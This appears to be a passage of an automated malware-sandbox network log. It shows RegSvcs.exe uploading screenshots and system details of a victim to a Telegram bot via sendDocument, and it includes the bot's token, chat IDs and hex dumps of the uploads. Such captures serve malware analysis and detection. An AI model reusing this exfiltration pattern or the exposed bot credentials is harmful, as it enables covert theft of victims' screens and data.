                                                                                      2024-12-06 04:54:39 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 37 39 30 64 39 34 62 64 39 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 37 39 30 64 39 34 62 64 39 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 30 39 2f 32 30 32 35 20 31 37 3a 35 33 3a 33 35 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd7790d94bd903Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd7790d94bd903Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/09/2025 17:53:35User
                                                                                      2024-12-06 04:54:39 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:54:39 UTC16355OUTData Raw: 49 19 c8 e9 b8 e6 a5 d2 26 23 57 88 a9 e3 0d bb e9 83 ff 00 d6 aa 3f 61 97 38 59 54 af bd 5f b0 89 2d 49 3b b2 ed c1 6a f6 71 98 ea 0f 0d 2a 74 f5 ba b5 bd 4f 3b 0f 84 ac a5 ef a3 a5 8e 5d f3 7b 0a cb d6 a4 12 5c 27 fb bf d4 d3 85 d8 44 c0 3c 9a a1 3c a6 59 4b f6 e8 2b cc c9 30 f2 fa c7 b4 e8 91 e5 f1 03 8d 3c 3a 83 dd bf c8 8e 8a 28 af b0 3e 28 28 a2 8a 00 ef c9 aa 4c 7f 7c ff 00 ef 1a b8 4d 51 c8 69 18 8e 84 e6 bf 3d 9b 3f 40 89 32 57 29 aa 42 f0 ea 13 07 18 de c5 d7 dc 13 5d 52 57 3f e2 3f f8 ff 00 8f fe b9 0f e6 6b d5 c9 66 e3 5d c7 ba 3c 9c e2 09 d0 52 ec cc 9a 29 69 2b eb 4f 95 0a 28 a2 81 95 75 1f f5 0b fe f7 f4 35 d4 e9 f2 ab f8 76 db 57 24 79 b6 36 b3 44 3f de e0 2f e9 fc eb 99 bc 89 e5 84 2a 0c 90 d9 a9 2c 74 9d 72 ee ca 48 ed 12 56 b5 2f 87 41
                                                                                      Data Ascii: I&#W?a8YT_-I;jq*tO;]{\'D<<YK+0<:(>((L|MQi=?@2W)B]RW??kf]<R)i+O(u5vW$y6D?/*,trHV/A
                                                                                      2024-12-06 04:54:39 UTC16355OUTData Raw: b4 d9 74 7b 38 64 31 cb ac 5b 46 e3 aa b9 00 8f c0 9a f3 d6 39 3d a2 cf 59 e5 52 5b c9 18 d4 56 b7 f6 5e 9f ff 00 41 cb 3f fb e9 7f f8 aa b1 07 87 a2 b9 42 f6 fa 94 52 a0 38 2d 18 0c 33 e9 c1 a6 f1 a9 6f 16 0b 2b 93 da 68 c1 a2 ba 6f f8 46 94 01 fb d4 3c 0f e1 3f 8f 7e f5 cf 5d c6 21 bb 9a 21 d1 1d 97 f2 35 ad 1c 52 ad 2e 54 8e 7c 4e 06 58 78 29 b7 7d 6c 45 49 4b 45 74 9c 22 50 78 04 d1 50 cd 73 0c 65 91 9f 0d 8e 98 34 a4 dd 9d 8b a7 1e 69 a5 63 a9 ff 00 84 51 bf e7 f8 7f df 9f fe ca 8f f8 45 1b fe 7f c7 fd f9 ff 00 ec aa df fc 25 7a 1f fc ff 00 7f e4 27 ff 00 0a 51 e2 ad 0c 90 05 f0 e7 d6 37 1f d2 bc 6e 7c 4f 99 f4 df 56 c2 f6 46 65 e7 86 e4 b6 b7 32 25 d0 95 b7 2a 84 f2 f6 e4 b3 01 d7 3e f5 88 ea d1 bb 23 a9 57 53 82 a7 a8 35 df df a3 c9 6d 88 d0 bb 2c
                                                                                      Data Ascii: t{8d1[F9=YR[V^A?BR8-3o+hoF<?~]!!5R.T|NXx)}lEIKEt"PxPse4icQE%z'Q7n|OVFe2%*>#WS5m,
                                                                                      2024-12-06 04:54:39 UTC15447OUTData Raw: 94 82 c4 0c 13 df af 5a 49 7e d6 65 b7 95 ad 91 a4 82 09 60 cc 61 63 56 56 56 0b f2 aa 80 31 b8 f4 eb 5a 34 56 2f 09 4d ab 1d 2b 31 ac 99 42 17 bc 4c 1f b2 40 20 58 3e ce 21 f2 e3 df e5 ed da 47 99 b7 77 5e 7e b5 19 17 2d 01 89 ed dc da 88 d5 52 11 20 0c 8e 0e 77 ee db d4 e5 b3 c7 43 8e c2 b4 e8 a3 ea 94 c3 fb 42 b1 4a e9 22 bd 92 69 4d 9d cc 32 ba 85 40 d3 2b a4 6a 3a 00 02 03 fa d3 26 5b 9b 8d 45 2f bc 88 d0 c5 19 4f 28 e4 ac 9b b3 e6 67 a7 de 2c d9 fa d6 85 14 fe ab 4e c9 3e 84 fd 7e b5 db 5a 5c a3 e6 3d bc b0 3d 8d 9d c4 46 20 e0 6e 9f 25 77 29 51 82 14 63 19 cf 73 c0 e6 a0 6b 05 73 e7 5f 0b ab c9 99 40 69 04 d8 93 23 a7 cc 43 76 f6 ad 5a 29 fd 5a 17 bb 17 d7 6a 68 96 84 69 24 d3 4d 35 c4 cb b5 a4 6c 85 ce 70 31 81 cf 73 ef de 9b 2a e2 58 e6 f2 44 db
                                                                                      Data Ascii: ZI~e`acVVV1Z4V/M+1BL@ X>!Gw^~-R wCBJ"iM2@+j:&[E/O(g,N>~Z\==F n%w)Qcsks_@i#CvZ)Zjhi$M5lp1s*XD
                                                                                      2024-12-06 04:54:39 UTC2998OUTData Raw: bb 05 0c ec 15 46 4f 52 4f 41 ef 40 0c a2 ba 0f ed 2d 33 4d ff 00 89 74 16 b1 df 5a 37 17 53 b0 c3 cc 7d 63 3d 50 2f 6f 5e fe 95 95 a9 da c1 6b 74 16 d6 e9 2e 6d dd 43 c6 e3 ae 0f 66 1f c2 c3 b8 fe 84 52 18 db 1b 0b 8b f7 91 6d c4 7f ba 4f 31 da 49 52 35 55 c8 5c 96 62 07 56 03 f1 ab 72 78 7b 50 89 82 c8 f6 28 c5 43 00 da 85 b8 38 23 20 fd fe 84 10 7f 1a b5 e0 cb d6 b4 d7 e2 85 5a 64 6b c3 1d b0 96 19 02 34 79 95 0e ee 54 82 3e 5c 10 47 20 91 4e d6 b4 dd 77 54 d4 9e ef fb 0f 54 5d c9 1a 7e f6 27 91 ce d4 55 cb 36 d1 92 76 e4 9c 77 a0 0c cb ad 26 ee d2 d4 dc c8 6d de 10 e2 32 d0 dc c5 2e 18 82 40 21 18 e3 21 4f e5 54 6b 72 5d 3a fe c3 c2 f7 9f 6d b2 b8 b6 df 79 6f b3 ce 89 93 76 12 6c e3 23 9e a3 f3 a6 78 6b 3e 75 ef 93 f6 4f b5 fd 9c 7d 9b ed 5e 5e dd fe
                                                                                      Data Ascii: FOROA@-3MtZ7S}c=P/o^kt.mCfRmO1IR5U\bVrx{P(C8# Zdk4yT>\G NwTT]~'U6vw&m2.@!!OTkr]:myovl#xk>uO}^^
                                                                                      2024-12-06 04:54:39 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 37 39 30 64 39 34 62 64 39 30 33 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd7790d94bd903--
                                                                                      2024-12-06 04:54:39 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:54:40 UTC1514INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:54:40 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1125
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170417,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460880,"document":{"file_name":"user-610930 2025-04-09 18-03-36.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZsWdSg4_8OQAB1YzwbcPzVkirBpR5UwAC_hQAAjoemVJLIw_HIbV5XQEAB20AAzYE","file_unique_id":"AQAD_hQAAjoemVJy","file_size":12457,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZsWdSg4_8OQAB1YzwbcPzVkirBpR5UwAC_hQAAjoemVJLIw_HIbV5XQEAB20AAzYE","file_unique_id":"AQAD_hQAAjoemVJy","file_size":12457,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmbFnUoOP_DkAAdWM8G3D81ZIqwaUeVMAAv4UAAI6HplSSyMPxyG1eV02BA","file_unique_id":"AgAD_hQAAjoemVI","file_size":67963},"caption":"New SC Recovered!\n\nTime: 04/09/2025 17:53:35\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.450035149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:54:54 UTC238OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd7eb6d4e31816
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 67091
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:54:55 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 65 62 36 64 34 65 33 31 38 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 65 62 36 64 34 65 33 31 38 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 31 38 2f 32 30 32 35 20 32 30 3a 32 33 3a 30 37 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd7eb6d4e31816Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd7eb6d4e31816Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/18/2025 20:23:07User
                                                                                      2024-12-06 04:54:55 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:54:55 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:54:55 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:54:55 UTC15447OUTData Raw: 45 dd 65 2a 0e f6 1c 60 1e c7 de b1 ad 55 51 8f 33 47 4e 1b 0e f1 13 70 4e da 5c e7 e8 ae d3 fb 03 4b ff 00 9f 63 ff 00 7f 5f fc 68 fe c0 d2 ff 00 e7 d8 ff 00 df d7 ff 00 1a e5 fa fc 7b 1d ff 00 d9 33 fe 64 71 74 56 8e a1 a5 c9 6f 13 dd 42 0b 5b f9 b2 29 1d 4c 78 72 07 e1 c7 5a ce ae aa 55 a3 56 37 89 e7 e2 30 f3 c3 cb 96 41 45 14 56 c7 38 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 52 52 d2 50 30 a2 8a 28 00 a2 8a 28 01 28 a2 8a 00 28 a2 8a 00 28 a2 8a 06 14 94 51 40 05 14 51 4c 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40
                                                                                      Data Ascii: Ee*`UQ3GNpN\Kc_h{3dqtVoB[)LxrZUV70AEV8QEQEQEQERRP0(((((Q@QL(((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@
                                                                                      2024-12-06 04:54:55 UTC1505OUTData Raw: e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 47 3f fc 7b c9 fe e9 fe 54 79 f0 ff 00 cf 54 ff 00 be 85 32 69 a2 30 48 04 88 49 53 fc 43 d2 80 3e 7d a2 8a 2b 53 03 6f 4c f1 24 f6 76 3f 60 b9 b5 82 fe cf 3b 96 1b 85 c8 53 ea 0f 6f c2 8d 4f c4 93 de 58 fd 82 da d6 0b 0b 3c ee 68 6d d7 01 8f a9 3d ff 00 1a c4 a4 a2 c1 70 a2 8a 29 80 51 45 14 01 af 73 e2 7d 72 e2 ea 59 ff 00 b5 6f 22 f3 1c bf 97 15 c3 aa 2e 4e 70 a3 3c 01 da a3 97 5c be 9e 78 67 b8 93 cf 9a 2b 69 2d bc c9 4b 33 32 b8 70 49 24 f2 40 90 e3 e8 2b 32 8a 41 70 a2 8a 28 00 a2 8a 29 81 d7 4d e3 18 ae 63 89 25 b4 78 fc b5 c0 2a c1 b3 fc b1 d2 a4 9b c6 d0 cf 17 94 da 69 88 1e ae b2 06
                                                                                      Data Ascii: Q=S%OQ=S%OQ=S%G?{TyT2i0HISC>}+SoL$v?`;SoOX<hm=p)QEs}rYo".Np<\xg+i-K32pI$@+2Ap()Mc%x*i
                                                                                      2024-12-06 04:54:55 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 65 62 36 64 34 65 33 31 38 31 36 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd7eb6d4e31816--
                                                                                      2024-12-06 04:54:55 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:54:56 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:54:56 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170421,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460896,"document":{"file_name":"user-610930 2025-04-18 20-23-07.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZtWdSg5-80lPXypwJDP2Wd4fzYCuoAAL_FAACOh6ZUuvs3n6PKtm2AQAHbQADNgQ","file_unique_id":"AQAD_xQAAjoemVJy","file_size":12304,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZtWdSg5-80lPXypwJDP2Wd4fzYCuoAAL_FAACOh6ZUuvs3n6PKtm2AQAHbQADNgQ","file_unique_id":"AQAD_xQAAjoemVJy","file_size":12304,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmbVnUoOfvNJT18qcCQz9lneH82ArqAAC_xQAAjoemVLr7N5-jyrZtjYE","file_unique_id":"AgAD_xQAAjoemVI","file_size":66470},"caption":"New SC Recovered!\n\nTime: 04/18/2025 20:23:07\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.450036149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:55:00 UTC238OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd821a08413a24
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66944
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:55:01 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:55:02 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 38 32 31 61 30 38 34 31 33 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 38 32 31 61 30 38 34 31 33 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 33 2f 32 30 32 35 20 30 33 3a 33 30 3a 34 37 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd821a08413a24Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd821a08413a24Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/23/2025 03:30:47User
                                                                                      2024-12-06 04:55:02 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:55:02 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:55:02 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 